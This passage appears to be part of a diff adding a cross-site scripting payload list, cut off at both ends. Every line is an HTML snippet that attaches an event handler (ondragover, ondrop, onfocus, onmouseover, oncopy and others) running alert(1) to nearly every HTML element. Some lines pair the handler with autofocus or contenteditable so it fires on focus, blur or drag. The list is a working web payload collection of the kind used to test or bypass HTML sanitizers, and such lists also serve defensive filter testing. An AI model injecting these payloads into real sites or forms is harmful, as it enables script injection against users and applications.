contenteditable>drag me</div><b ondragover=alert(1) contenteditable>drop here</b> +<div draggable="true" contenteditable>drag me</div><b ondrop=alert(1) contenteditable>drop here</b> +<div draggable="true" contenteditable>drag me</div><base ondragover=alert(1) contenteditable>drop here</base> +<div draggable="true" contenteditable>drag me</div><base ondrop=alert(1) contenteditable>drop here</base> +<div draggable="true" contenteditable>drag me</div><basefont ondragover=alert(1) contenteditable>drop here</basefont> +<div draggable="true" contenteditable>drag me</div><basefont ondrop=alert(1) contenteditable>drop here</basefont> +<div draggable="true" contenteditable>drag me</div><bdi ondragover=alert(1) contenteditable>drop here</bdi> +<div draggable="true" contenteditable>drag me</div><bdi ondrop=alert(1) contenteditable>drop here</bdi> +<div draggable="true" contenteditable>drag me</div><bdo ondragover=alert(1) contenteditable>drop here</bdo> +<div draggable="true" contenteditable>drag me</div><bdo ondrop=alert(1) contenteditable>drop here</bdo> +<div draggable="true" contenteditable>drag me</div><bgsound ondragover=alert(1) contenteditable>drop here</bgsound> +<div draggable="true" contenteditable>drag me</div><bgsound ondrop=alert(1) contenteditable>drop here</bgsound> +<div draggable="true" contenteditable>drag me</div><big ondragover=alert(1) contenteditable>drop here</big> +<div draggable="true" contenteditable>drag me</div><big ondrop=alert(1) contenteditable>drop here</big> +<div draggable="true" contenteditable>drag me</div><blink ondragover=alert(1) contenteditable>drop here</blink> +<div draggable="true" contenteditable>drag me</div><blink ondrop=alert(1) contenteditable>drop here</blink> +<div draggable="true" contenteditable>drag me</div><blockquote ondragover=alert(1) contenteditable>drop here</blockquote> +<div draggable="true" contenteditable>drag me</div><blockquote ondrop=alert(1) contenteditable>drop here</blockquote> +<div draggable="true" contenteditable>drag me</div><body ondragover=alert(1) contenteditable>drop here</body> +<div draggable="true" contenteditable>drag me</div><body ondrop=alert(1) contenteditable>drop here</body> +<div draggable="true" contenteditable>drag me</div><br ondragover=alert(1) contenteditable>drop here</br> +<div draggable="true" contenteditable>drag me</div><br ondrop=alert(1) contenteditable>drop here</br> +<div draggable="true" contenteditable>drag me</div><button ondragover=alert(1) contenteditable>drop here</button> +<div draggable="true" contenteditable>drag me</div><button ondrop=alert(1) contenteditable>drop here</button> +<div draggable="true" contenteditable>drag me</div><canvas ondragover=alert(1) contenteditable>drop here</canvas> +<div draggable="true" contenteditable>drag me</div><canvas ondrop=alert(1) contenteditable>drop here</canvas> +<div draggable="true" contenteditable>drag me</div><caption ondragover=alert(1) contenteditable>drop here</caption> +<div draggable="true" contenteditable>drag me</div><caption ondrop=alert(1) contenteditable>drop here</caption> +<div draggable="true" contenteditable>drag me</div><center ondragover=alert(1) contenteditable>drop here</center> +<div draggable="true" contenteditable>drag me</div><center ondrop=alert(1) contenteditable>drop here</center> +<div draggable="true" contenteditable>drag me</div><cite ondragover=alert(1) contenteditable>drop here</cite> +<div draggable="true" contenteditable>drag me</div><cite ondrop=alert(1) contenteditable>drop here</cite> +<div draggable="true" contenteditable>drag me</div><code ondragover=alert(1) contenteditable>drop here</code> +<div draggable="true" contenteditable>drag me</div><code ondrop=alert(1) contenteditable>drop here</code> +<div draggable="true" contenteditable>drag me</div><col ondragover=alert(1) contenteditable>drop here</col> +<div draggable="true" contenteditable>drag me</div><col ondrop=alert(1) contenteditable>drop here</col> +<div draggable="true" contenteditable>drag me</div><colgroup ondragover=alert(1) contenteditable>drop here</colgroup> +<div draggable="true" contenteditable>drag me</div><colgroup ondrop=alert(1) contenteditable>drop here</colgroup> +<div draggable="true" contenteditable>drag me</div><command ondragover=alert(1) contenteditable>drop here</command> +<div draggable="true" contenteditable>drag me</div><command ondrop=alert(1) contenteditable>drop here</command> +<div draggable="true" contenteditable>drag me</div><content ondragover=alert(1) contenteditable>drop here</content> +<div draggable="true" contenteditable>drag me</div><content ondrop=alert(1) contenteditable>drop here</content> +<div draggable="true" contenteditable>drag me</div><data ondragover=alert(1) contenteditable>drop here</data> +<div draggable="true" contenteditable>drag me</div><data ondrop=alert(1) contenteditable>drop here</data> +<div draggable="true" contenteditable>drag me</div><datalist ondragover=alert(1) contenteditable>drop here</datalist> +<div draggable="true" contenteditable>drag me</div><datalist ondrop=alert(1) contenteditable>drop here</datalist> +<div draggable="true" contenteditable>drag me</div><dd ondragover=alert(1) contenteditable>drop here</dd> +<div draggable="true" contenteditable>drag me</div><dd ondrop=alert(1) contenteditable>drop here</dd> +<div draggable="true" contenteditable>drag me</div><del ondragover=alert(1) contenteditable>drop here</del> +<div draggable="true" contenteditable>drag me</div><del ondrop=alert(1) contenteditable>drop here</del> +<div draggable="true" contenteditable>drag me</div><details ondragover=alert(1) contenteditable>drop here</details> +<div draggable="true" contenteditable>drag me</div><details ondrop=alert(1) contenteditable>drop here</details> +<div draggable="true" contenteditable>drag me</div><dfn ondragover=alert(1) contenteditable>drop here</dfn> +<div draggable="true" contenteditable>drag me</div><dfn ondrop=alert(1) contenteditable>drop here</dfn> +<div draggable="true" contenteditable>drag me</div><dialog ondragover=alert(1) contenteditable>drop here</dialog> +<div draggable="true" contenteditable>drag me</div><dialog ondrop=alert(1) contenteditable>drop here</dialog> +<div draggable="true" contenteditable>drag me</div><dir ondragover=alert(1) contenteditable>drop here</dir> +<div draggable="true" contenteditable>drag me</div><dir ondrop=alert(1) contenteditable>drop here</dir> +<div draggable="true" contenteditable>drag me</div><div ondragover=alert(1) contenteditable>drop here</div> +<div draggable="true" contenteditable>drag me</div><div ondrop=alert(1) contenteditable>drop here</div> +<div draggable="true" contenteditable>drag me</div><dl ondragover=alert(1) contenteditable>drop here</dl> +<div draggable="true" contenteditable>drag me</div><dl ondrop=alert(1) contenteditable>drop here</dl> +<div draggable="true" contenteditable>drag me</div><dt ondragover=alert(1) contenteditable>drop here</dt> +<div draggable="true" contenteditable>drag me</div><dt ondrop=alert(1) contenteditable>drop here</dt> +<div draggable="true" contenteditable>drag me</div><element ondragover=alert(1) contenteditable>drop here</element> +<div draggable="true" contenteditable>drag me</div><element ondrop=alert(1) contenteditable>drop here</element> +<div draggable="true" contenteditable>drag me</div><em ondragover=alert(1) contenteditable>drop here</em> +<div draggable="true" contenteditable>drag me</div><em ondrop=alert(1) contenteditable>drop here</em> +<div draggable="true" contenteditable>drag me</div><embed ondragover=alert(1) contenteditable>drop here</embed> +<div draggable="true" contenteditable>drag me</div><embed ondrop=alert(1) contenteditable>drop here</embed> +<div draggable="true" contenteditable>drag me</div><fieldset ondragover=alert(1) contenteditable>drop here</fieldset> +<div draggable="true" contenteditable>drag me</div><fieldset ondrop=alert(1) contenteditable>drop here</fieldset> +<div draggable="true" contenteditable>drag me</div><figcaption ondragover=alert(1) contenteditable>drop here</figcaption> +<div draggable="true" contenteditable>drag me</div><figcaption ondrop=alert(1) contenteditable>drop here</figcaption> +<div draggable="true" contenteditable>drag me</div><figure ondragover=alert(1) contenteditable>drop here</figure> +<div draggable="true" contenteditable>drag me</div><figure ondrop=alert(1) contenteditable>drop here</figure> +<div draggable="true" contenteditable>drag me</div><font ondragover=alert(1) contenteditable>drop here</font> +<div draggable="true" contenteditable>drag me</div><font ondrop=alert(1) contenteditable>drop here</font> +<div draggable="true" contenteditable>drag me</div><footer ondragover=alert(1) contenteditable>drop here</footer> +<div draggable="true" contenteditable>drag me</div><footer ondrop=alert(1) contenteditable>drop here</footer> +<div draggable="true" contenteditable>drag me</div><form ondragover=alert(1) contenteditable>drop here</form> +<div draggable="true" contenteditable>drag me</div><form ondrop=alert(1) contenteditable>drop here</form> +<div draggable="true" contenteditable>drag me</div><frame ondragover=alert(1) contenteditable>drop here</frame> +<div draggable="true" contenteditable>drag me</div><frame ondrop=alert(1) contenteditable>drop here</frame> +<div draggable="true" contenteditable>drag me</div><frameset ondragover=alert(1) contenteditable>drop here</frameset> +<div draggable="true" contenteditable>drag me</div><frameset ondrop=alert(1) contenteditable>drop here</frameset> +<div draggable="true" contenteditable>drag me</div><h1 ondragover=alert(1) contenteditable>drop here</h1> +<div draggable="true" contenteditable>drag me</div><h1 ondrop=alert(1) contenteditable>drop here</h1> +<div draggable="true" contenteditable>drag me</div><head ondragover=alert(1) contenteditable>drop here</head> +<div draggable="true" contenteditable>drag me</div><head ondrop=alert(1) contenteditable>drop here</head> +<div draggable="true" contenteditable>drag me</div><header ondragover=alert(1) contenteditable>drop here</header> +<div draggable="true" contenteditable>drag me</div><header ondrop=alert(1) contenteditable>drop here</header> +<div draggable="true" contenteditable>drag me</div><hgroup ondragover=alert(1) contenteditable>drop here</hgroup> +<div draggable="true" contenteditable>drag me</div><hgroup ondrop=alert(1) contenteditable>drop here</hgroup> +<div draggable="true" contenteditable>drag me</div><hr ondragover=alert(1) contenteditable>drop here</hr> +<div draggable="true" contenteditable>drag me</div><hr ondrop=alert(1) contenteditable>drop here</hr> +<div draggable="true" contenteditable>drag me</div><html ondragover=alert(1) contenteditable>drop here</html> +<div draggable="true" contenteditable>drag me</div><html ondrop=alert(1) contenteditable>drop here</html> +<div draggable="true" contenteditable>drag me</div><i ondragover=alert(1) contenteditable>drop here</i> +<div draggable="true" contenteditable>drag me</div><i ondrop=alert(1) contenteditable>drop here</i> +<div draggable="true" contenteditable>drag me</div><iframe ondragover=alert(1) contenteditable>drop here</iframe> +<div draggable="true" contenteditable>drag me</div><iframe ondrop=alert(1) contenteditable>drop here</iframe> +<div draggable="true" contenteditable>drag me</div><image ondragover=alert(1) contenteditable>drop here</image> +<div draggable="true" contenteditable>drag me</div><image ondrop=alert(1) contenteditable>drop here</image> +<div draggable="true" contenteditable>drag me</div><img ondragover=alert(1) contenteditable>drop here</img> +<div draggable="true" contenteditable>drag me</div><img ondrop=alert(1) contenteditable>drop here</img> +<div draggable="true" contenteditable>drag me</div><input ondragover=alert(1) contenteditable>drop here</input> +<div draggable="true" contenteditable>drag me</div><input ondrop=alert(1) contenteditable>drop here</input> +<div draggable="true" contenteditable>drag me</div><ins ondragover=alert(1) contenteditable>drop here</ins> +<div draggable="true" contenteditable>drag me</div><ins ondrop=alert(1) contenteditable>drop here</ins> +<div draggable="true" contenteditable>drag me</div><isindex ondragover=alert(1) contenteditable>drop here</isindex> +<div draggable="true" contenteditable>drag me</div><isindex ondrop=alert(1) contenteditable>drop here</isindex> +<div draggable="true" contenteditable>drag me</div><kbd ondragover=alert(1) contenteditable>drop here</kbd> +<div draggable="true" contenteditable>drag me</div><kbd ondrop=alert(1) contenteditable>drop here</kbd> +<div draggable="true" contenteditable>drag me</div><keygen ondragover=alert(1) contenteditable>drop here</keygen> +<div draggable="true" contenteditable>drag me</div><keygen ondrop=alert(1) contenteditable>drop here</keygen> +<div draggable="true" contenteditable>drag me</div><label ondragover=alert(1) contenteditable>drop here</label> +<div draggable="true" contenteditable>drag me</div><label ondrop=alert(1) contenteditable>drop here</label> +<div draggable="true" contenteditable>drag me</div><legend ondragover=alert(1) contenteditable>drop here</legend> +<div draggable="true" contenteditable>drag me</div><legend ondrop=alert(1) contenteditable>drop here</legend> +<div draggable="true" contenteditable>drag me</div><li ondragover=alert(1) contenteditable>drop here</li> +<div draggable="true" contenteditable>drag me</div><li ondrop=alert(1) contenteditable>drop here</li> +<div draggable="true" contenteditable>drag me</div><link ondragover=alert(1) contenteditable>drop here</link> +<div draggable="true" contenteditable>drag me</div><link ondrop=alert(1) contenteditable>drop here</link> +<div draggable="true" contenteditable>drag me</div><listing ondragover=alert(1) contenteditable>drop here</listing> +<div draggable="true" contenteditable>drag me</div><listing ondrop=alert(1) contenteditable>drop here</listing> +<div draggable="true" contenteditable>drag me</div><main ondragover=alert(1) contenteditable>drop here</main> +<div draggable="true" contenteditable>drag me</div><main ondrop=alert(1) contenteditable>drop here</main> +<div draggable="true" contenteditable>drag me</div><map ondragover=alert(1) contenteditable>drop here</map> +<div draggable="true" contenteditable>drag me</div><map ondrop=alert(1) contenteditable>drop here</map> +<div draggable="true" contenteditable>drag me</div><mark ondragover=alert(1) contenteditable>drop here</mark> +<div draggable="true" contenteditable>drag me</div><mark ondrop=alert(1) contenteditable>drop here</mark> +<div draggable="true" contenteditable>drag me</div><marquee ondragover=alert(1) contenteditable>drop here</marquee> +<div draggable="true" contenteditable>drag me</div><marquee ondrop=alert(1) contenteditable>drop here</marquee> +<div draggable="true" contenteditable>drag me</div><menu ondragover=alert(1) contenteditable>drop here</menu> +<div draggable="true" contenteditable>drag me</div><menu ondrop=alert(1) contenteditable>drop here</menu> +<div draggable="true" contenteditable>drag me</div><menuitem ondragover=alert(1) contenteditable>drop here</menuitem> +<div draggable="true" contenteditable>drag me</div><menuitem ondrop=alert(1) contenteditable>drop here</menuitem> +<div draggable="true" contenteditable>drag me</div><meta ondragover=alert(1) contenteditable>drop here</meta> +<div draggable="true" contenteditable>drag me</div><meta ondrop=alert(1) contenteditable>drop here</meta> +<div draggable="true" contenteditable>drag me</div><meter ondragover=alert(1) contenteditable>drop here</meter> +<div draggable="true" contenteditable>drag me</div><meter ondrop=alert(1) contenteditable>drop here</meter> +<div draggable="true" contenteditable>drag me</div><multicol ondragover=alert(1) contenteditable>drop here</multicol> +<div draggable="true" contenteditable>drag me</div><multicol ondrop=alert(1) contenteditable>drop here</multicol> +<div draggable="true" contenteditable>drag me</div><nav ondragover=alert(1) contenteditable>drop here</nav> +<div draggable="true" contenteditable>drag me</div><nav ondrop=alert(1) contenteditable>drop here</nav> +<div draggable="true" contenteditable>drag me</div><nextid ondragover=alert(1) contenteditable>drop here</nextid> +<div draggable="true" contenteditable>drag me</div><nextid ondrop=alert(1) contenteditable>drop here</nextid> +<div draggable="true" contenteditable>drag me</div><nobr ondragover=alert(1) contenteditable>drop here</nobr> +<div draggable="true" contenteditable>drag me</div><nobr ondrop=alert(1) contenteditable>drop here</nobr> +<div draggable="true" contenteditable>drag me</div><noembed ondragover=alert(1) contenteditable>drop here</noembed> +<div draggable="true" contenteditable>drag me</div><noembed ondrop=alert(1) contenteditable>drop here</noembed> +<div draggable="true" contenteditable>drag me</div><noframes ondragover=alert(1) contenteditable>drop here</noframes> +<div draggable="true" contenteditable>drag me</div><noframes ondrop=alert(1) contenteditable>drop here</noframes> +<div draggable="true" contenteditable>drag me</div><noscript ondragover=alert(1) contenteditable>drop here</noscript> +<div draggable="true" contenteditable>drag me</div><noscript ondrop=alert(1) contenteditable>drop here</noscript> +<div draggable="true" contenteditable>drag me</div><object ondragover=alert(1) contenteditable>drop here</object> +<div draggable="true" contenteditable>drag me</div><object ondrop=alert(1) contenteditable>drop here</object> +<div draggable="true" contenteditable>drag me</div><ol ondragover=alert(1) contenteditable>drop here</ol> +<div draggable="true" contenteditable>drag me</div><ol ondrop=alert(1) contenteditable>drop here</ol> +<div draggable="true" contenteditable>drag me</div><optgroup ondragover=alert(1) contenteditable>drop here</optgroup> +<div draggable="true" contenteditable>drag me</div><optgroup ondrop=alert(1) contenteditable>drop here</optgroup> +<div draggable="true" contenteditable>drag me</div><option ondragover=alert(1) contenteditable>drop here</option> +<div draggable="true" contenteditable>drag me</div><option ondrop=alert(1) contenteditable>drop here</option> +<div draggable="true" contenteditable>drag me</div><output ondragover=alert(1) contenteditable>drop here</output> +<div draggable="true" contenteditable>drag me</div><output ondrop=alert(1) contenteditable>drop here</output> +<div draggable="true" contenteditable>drag me</div><p ondragover=alert(1) contenteditable>drop here</p> +<div draggable="true" contenteditable>drag me</div><p ondrop=alert(1) contenteditable>drop here</p> +<div draggable="true" contenteditable>drag me</div><param ondragover=alert(1) contenteditable>drop here</param> +<div draggable="true" contenteditable>drag me</div><param ondrop=alert(1) contenteditable>drop here</param> +<div draggable="true" contenteditable>drag me</div><picture ondragover=alert(1) contenteditable>drop here</picture> +<div draggable="true" contenteditable>drag me</div><picture ondrop=alert(1) contenteditable>drop here</picture> +<div draggable="true" contenteditable>drag me</div><plaintext ondragover=alert(1) contenteditable>drop here</plaintext> +<div draggable="true" contenteditable>drag me</div><plaintext ondrop=alert(1) contenteditable>drop here</plaintext> +<div draggable="true" contenteditable>drag me</div><pre ondragover=alert(1) contenteditable>drop here</pre> +<div draggable="true" contenteditable>drag me</div><pre ondrop=alert(1) contenteditable>drop here</pre> +<div draggable="true" contenteditable>drag me</div><progress ondragover=alert(1) contenteditable>drop here</progress> +<div draggable="true" contenteditable>drag me</div><progress ondrop=alert(1) contenteditable>drop here</progress> +<div draggable="true" contenteditable>drag me</div><q ondragover=alert(1) contenteditable>drop here</q> +<div draggable="true" contenteditable>drag me</div><q ondrop=alert(1) contenteditable>drop here</q> +<div draggable="true" contenteditable>drag me</div><rb ondragover=alert(1) contenteditable>drop here</rb> +<div draggable="true" contenteditable>drag me</div><rb ondrop=alert(1) contenteditable>drop here</rb> +<div draggable="true" contenteditable>drag me</div><rp ondragover=alert(1) contenteditable>drop here</rp> +<div draggable="true" contenteditable>drag me</div><rp ondrop=alert(1) contenteditable>drop here</rp> +<div draggable="true" contenteditable>drag me</div><rt ondragover=alert(1) contenteditable>drop here</rt> +<div draggable="true" contenteditable>drag me</div><rt ondrop=alert(1) contenteditable>drop here</rt> +<div draggable="true" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc> +<div draggable="true" contenteditable>drag me</div><rtc ondrop=alert(1) contenteditable>drop here</rtc> +<div draggable="true" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby> +<div draggable="true" contenteditable>drag me</div><ruby ondrop=alert(1) contenteditable>drop here</ruby> +<div draggable="true" contenteditable>drag me</div><s ondragover=alert(1) contenteditable>drop here</s> +<div draggable="true" contenteditable>drag me</div><s ondrop=alert(1) contenteditable>drop here</s> +<div draggable="true" contenteditable>drag me</div><samp ondragover=alert(1) contenteditable>drop here</samp> +<div draggable="true" contenteditable>drag me</div><samp ondrop=alert(1) contenteditable>drop here</samp> +<div draggable="true" contenteditable>drag me</div><script ondragover=alert(1) contenteditable>drop here</script> +<div draggable="true" contenteditable>drag me</div><script ondrop=alert(1) contenteditable>drop here</script> +<div draggable="true" contenteditable>drag me</div><section ondragover=alert(1) contenteditable>drop here</section> +<div draggable="true" contenteditable>drag me</div><section ondrop=alert(1) contenteditable>drop here</section> +<div draggable="true" contenteditable>drag me</div><select ondragover=alert(1) contenteditable>drop here</select> +<div draggable="true" contenteditable>drag me</div><select ondrop=alert(1) contenteditable>drop here</select> +<div draggable="true" contenteditable>drag me</div><shadow ondragover=alert(1) contenteditable>drop here</shadow> +<div draggable="true" contenteditable>drag me</div><shadow ondrop=alert(1) contenteditable>drop here</shadow> +<div draggable="true" contenteditable>drag me</div><slot ondragover=alert(1) contenteditable>drop here</slot> +<div draggable="true" contenteditable>drag me</div><slot ondrop=alert(1) contenteditable>drop here</slot> +<div draggable="true" contenteditable>drag me</div><small ondragover=alert(1) contenteditable>drop here</small> +<div draggable="true" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small> +<div draggable="true" contenteditable>drag me</div><source ondragover=alert(1) contenteditable>drop here</source> +<div draggable="true" contenteditable>drag me</div><source ondrop=alert(1) contenteditable>drop here</source> +<div draggable="true" contenteditable>drag me</div><spacer ondragover=alert(1) contenteditable>drop here</spacer> +<div draggable="true" contenteditable>drag me</div><spacer ondrop=alert(1) contenteditable>drop here</spacer> +<div draggable="true" contenteditable>drag me</div><span ondragover=alert(1) contenteditable>drop here</span> +<div draggable="true" contenteditable>drag me</div><span ondrop=alert(1) contenteditable>drop here</span> +<div draggable="true" contenteditable>drag me</div><strike ondragover=alert(1) contenteditable>drop here</strike> +<div draggable="true" contenteditable>drag me</div><strike ondrop=alert(1) contenteditable>drop here</strike> +<div draggable="true" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong> +<div draggable="true" contenteditable>drag me</div><strong ondrop=alert(1) contenteditable>drop here</strong> +<div draggable="true" contenteditable>drag me</div><style ondragover=alert(1) contenteditable>drop here</style> +<div draggable="true" contenteditable>drag me</div><style ondrop=alert(1) contenteditable>drop here</style> +<div draggable="true" contenteditable>drag me</div><sub ondragover=alert(1) contenteditable>drop here</sub> +<div draggable="true" contenteditable>drag me</div><sub ondrop=alert(1) contenteditable>drop here</sub> +<div draggable="true" contenteditable>drag me</div><summary ondragover=alert(1) contenteditable>drop here</summary> +<div draggable="true" contenteditable>drag me</div><summary ondrop=alert(1) contenteditable>drop here</summary> +<div draggable="true" contenteditable>drag me</div><sup ondragover=alert(1) contenteditable>drop here</sup> +<div draggable="true" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup> +<div draggable="true" contenteditable>drag me</div><svg ondragover=alert(1) contenteditable>drop here</svg> +<div draggable="true" contenteditable>drag me</div><svg ondrop=alert(1) contenteditable>drop here</svg> +<div draggable="true" contenteditable>drag me</div><table ondragover=alert(1) contenteditable>drop here</table> +<div draggable="true" contenteditable>drag me</div><table ondrop=alert(1) contenteditable>drop here</table> +<div draggable="true" contenteditable>drag me</div><tbody ondragover=alert(1) contenteditable>drop here</tbody> +<div draggable="true" contenteditable>drag me</div><tbody ondrop=alert(1) contenteditable>drop here</tbody> +<div draggable="true" contenteditable>drag me</div><td ondragover=alert(1) contenteditable>drop here</td> +<div draggable="true" contenteditable>drag me</div><td ondrop=alert(1) contenteditable>drop here</td> +<div draggable="true" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template> +<div draggable="true" contenteditable>drag me</div><template ondrop=alert(1) contenteditable>drop here</template> +<div draggable="true" contenteditable>drag me</div><textarea ondragover=alert(1) contenteditable>drop here</textarea> +<div draggable="true" contenteditable>drag me</div><textarea ondrop=alert(1) contenteditable>drop here</textarea> +<div draggable="true" contenteditable>drag me</div><tfoot ondragover=alert(1) contenteditable>drop here</tfoot> +<div draggable="true" contenteditable>drag me</div><tfoot ondrop=alert(1) contenteditable>drop here</tfoot> +<div draggable="true" contenteditable>drag me</div><th ondragover=alert(1) contenteditable>drop here</th> +<div draggable="true" contenteditable>drag me</div><th ondrop=alert(1) contenteditable>drop here</th> +<div draggable="true" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead> +<div draggable="true" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable>drop here</thead> +<div draggable="true" contenteditable>drag me</div><time ondragover=alert(1) contenteditable>drop here</time> +<div draggable="true" contenteditable>drag me</div><time ondrop=alert(1) contenteditable>drop here</time> +<div draggable="true" contenteditable>drag me</div><title ondragover=alert(1) contenteditable>drop here</title> +<div draggable="true" contenteditable>drag me</div><title ondrop=alert(1) contenteditable>drop here</title> +<div draggable="true" contenteditable>drag me</div><tr ondragover=alert(1) contenteditable>drop here</tr> +<div draggable="true" contenteditable>drag me</div><tr ondrop=alert(1) contenteditable>drop here</tr> +<div draggable="true" contenteditable>drag me</div><track ondragover=alert(1) contenteditable>drop here</track> +<div draggable="true" contenteditable>drag me</div><track ondrop=alert(1) contenteditable>drop here</track> +<div draggable="true" contenteditable>drag me</div><tt ondragover=alert(1) contenteditable>drop here</tt> +<div draggable="true" contenteditable>drag me</div><tt ondrop=alert(1) contenteditable>drop here</tt> +<div draggable="true" contenteditable>drag me</div><u ondragover=alert(1) contenteditable>drop here</u> +<div draggable="true" contenteditable>drag me</div><u ondrop=alert(1) contenteditable>drop here</u> +<div draggable="true" contenteditable>drag me</div><ul ondragover=alert(1) contenteditable>drop here</ul> +<div draggable="true" contenteditable>drag me</div><ul ondrop=alert(1) contenteditable>drop here</ul> +<div draggable="true" contenteditable>drag me</div><var ondragover=alert(1) contenteditable>drop here</var> +<div draggable="true" contenteditable>drag me</div><var ondrop=alert(1) contenteditable>drop here</var> +<div draggable="true" contenteditable>drag me</div><video ondragover=alert(1) contenteditable>drop here</video> +<div draggable="true" contenteditable>drag me</div><video ondrop=alert(1) contenteditable>drop here</video> +<div draggable="true" contenteditable>drag me</div><wbr ondragover=alert(1) contenteditable>drop here</wbr> +<div draggable="true" contenteditable>drag me</div><wbr ondrop=alert(1) contenteditable>drop here</wbr> +<div draggable="true" contenteditable>drag me</div><xmp ondragover=alert(1) contenteditable>drop here</xmp> +<div draggable="true" contenteditable>drag me</div><xmp ondrop=alert(1) contenteditable>drop here</xmp> +<div draggable="true" ondrag="alert(1)">test</div> +<div draggable="true" ondragend="alert(1)">test</div> +<div draggable="true" ondragenter="alert(1)">test</div> +<div draggable="true" ondragleave="alert(1)">test</div> +<div draggable="true" ondragstart="alert(1)">test</div> +<div id=x tabindex=1 onactivate=alert(1)></div> +<div id=x tabindex=1 onbeforeactivate=alert(1)></div> +<div id=x tabindex=1 onbeforedeactivate=alert(1)></div><input autofocus> +<div id=x tabindex=1 ondeactivate=alert(1)></div><input id=y autofocus> +<div id=x tabindex=1 onfocus=alert(1)></div> +<div id=x tabindex=1 onfocusin=alert(1)></div> +<div onbeforecopy="alert(1)" contenteditable>test</div> +<div onbeforecut="alert(1)" contenteditable>test</div> +<div onbeforepaste="alert(1)" contenteditable>test</div> +<div onblur=alert(1) tabindex=1 id=x></div><input autofocus> +<div onclick="alert(1)">test</div> +<div oncontextmenu="alert(1)">test</div> +<div oncopy="alert(1)" contenteditable>test</div> +<div oncut="alert(1)" contenteditable>test</div> +<div ondblclick="alert(1)">test</div> +<div onfocusout=alert(1) tabindex=1 id=x></div><input autofocus> +<div onkeydown="alert(1)" contenteditable>test</div> +<div onkeypress="alert(1)" contenteditable>test</div> +<div onkeyup="alert(1)" contenteditable>test</div> +<div onmousedown="alert(1)">test</div> +<div onmouseenter="alert(1)">test</div> +<div onmouseleave="alert(1)">test</div> +<div onmousemove="alert(1)">test</div> +<div onmouseout="alert(1)">test</div> +<div onmouseover="alert(1)">test</div> +<div onmouseup="alert(1)">test</div> +<div onpaste="alert(1)" contenteditable>test</div> +<dl draggable="true" ondrag="alert(1)">test</dl> +<dl draggable="true" ondragend="alert(1)">test</dl> +<dl draggable="true" ondragenter="alert(1)">test</dl> +<dl draggable="true" ondragleave="alert(1)">test</dl> +<dl draggable="true" ondragstart="alert(1)">test</dl> +<dl id=x tabindex=1 onactivate=alert(1)></dl> +<dl id=x tabindex=1 onbeforeactivate=alert(1)></dl> +<dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus> +<dl id=x tabindex=1 ondeactivate=alert(1)></dl><input id=y autofocus> +<dl id=x tabindex=1 onfocus=alert(1)></dl> +<dl id=x tabindex=1 onfocusin=alert(1)></dl> +<dl onbeforecopy="alert(1)" contenteditable>test</dl> +<dl onbeforecut="alert(1)" contenteditable>test</dl> +<dl onbeforepaste="alert(1)" contenteditable>test</dl> +<dl onblur=alert(1) tabindex=1 id=x></dl><input autofocus> +<dl onclick="alert(1)">test</dl> +<dl oncontextmenu="alert(1)">test</dl> +<dl oncopy="alert(1)" contenteditable>test</dl> +<dl oncut="alert(1)" contenteditable>test</dl> +<dl ondblclick="alert(1)">test</dl> +<dl onfocusout=alert(1) tabindex=1 id=x></dl><input autofocus> +<dl onkeydown="alert(1)" contenteditable>test</dl> +<dl onkeypress="alert(1)" contenteditable>test</dl> +<dl onkeyup="alert(1)" contenteditable>test</dl> +<dl onmousedown="alert(1)">test</dl> +<dl onmouseenter="alert(1)">test</dl> +<dl onmouseleave="alert(1)">test</dl> +<dl onmousemove="alert(1)">test</dl> +<dl onmouseout="alert(1)">test</dl> +<dl onmouseover="alert(1)">test</dl> +<dl onmouseup="alert(1)">test</dl> +<dl onpaste="alert(1)" contenteditable>test</dl> +<dt draggable="true" ondrag="alert(1)">test</dt> +<dt draggable="true" ondragend="alert(1)">test</dt> +<dt draggable="true" ondragenter="alert(1)">test</dt> +<dt draggable="true" ondragleave="alert(1)">test</dt> +<dt draggable="true" ondragstart="alert(1)">test</dt> +<dt id=x tabindex=1 onactivate=alert(1)></dt> +<dt id=x tabindex=1 onbeforeactivate=alert(1)></dt> +<dt id=x tabindex=1 onbeforedeactivate=alert(1)></dt><input autofocus> +<dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus> +<dt id=x tabindex=1 onfocus=alert(1)></dt> +<dt id=x tabindex=1 onfocusin=alert(1)></dt> +<dt onbeforecopy="alert(1)" contenteditable>test</dt> +<dt onbeforecut="alert(1)" contenteditable>test</dt> +<dt onbeforepaste="alert(1)" contenteditable>test</dt> +<dt onblur=alert(1) tabindex=1 id=x></dt><input autofocus> +<dt onclick="alert(1)">test</dt> +<dt oncontextmenu="alert(1)">test</dt> +<dt oncopy="alert(1)" contenteditable>test</dt> +<dt oncut="alert(1)" contenteditable>test</dt> +<dt ondblclick="alert(1)">test</dt> +<dt onfocusout=alert(1) tabindex=1 id=x></dt><input autofocus> +<dt onkeydown="alert(1)" contenteditable>test</dt> +<dt onkeypress="alert(1)" contenteditable>test</dt> +<dt onkeyup="alert(1)" contenteditable>test</dt> +<dt onmousedown="alert(1)">test</dt> +<dt onmouseenter="alert(1)">test</dt> +<dt onmouseleave="alert(1)">test</dt> +<dt onmousemove="alert(1)">test</dt> +<dt onmouseout="alert(1)">test</dt> +<dt onmouseover="alert(1)">test</dt> +<dt onmouseup="alert(1)">test</dt> +<dt onpaste="alert(1)" contenteditable>test</dt> +<element draggable="true" ondrag="alert(1)">test</element> +<element draggable="true" ondragend="alert(1)">test</element> +<element draggable="true" ondragenter="alert(1)">test</element> +<element draggable="true" ondragleave="alert(1)">test</element> +<element draggable="true" ondragstart="alert(1)">test</element> +<element id=x tabindex=1 onactivate=alert(1)></element> +<element id=x tabindex=1 onbeforeactivate=alert(1)></element> +<element id=x tabindex=1 onbeforedeactivate=alert(1)></element><input autofocus> +<element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus> +<element id=x tabindex=1 onfocus=alert(1)></element> +<element id=x tabindex=1 onfocusin=alert(1)></element> +<element onbeforecopy="alert(1)" contenteditable>test</element> +<element onbeforecut="alert(1)" contenteditable>test</element> +<element onbeforepaste="alert(1)" contenteditable>test</element> +<element onblur=alert(1) 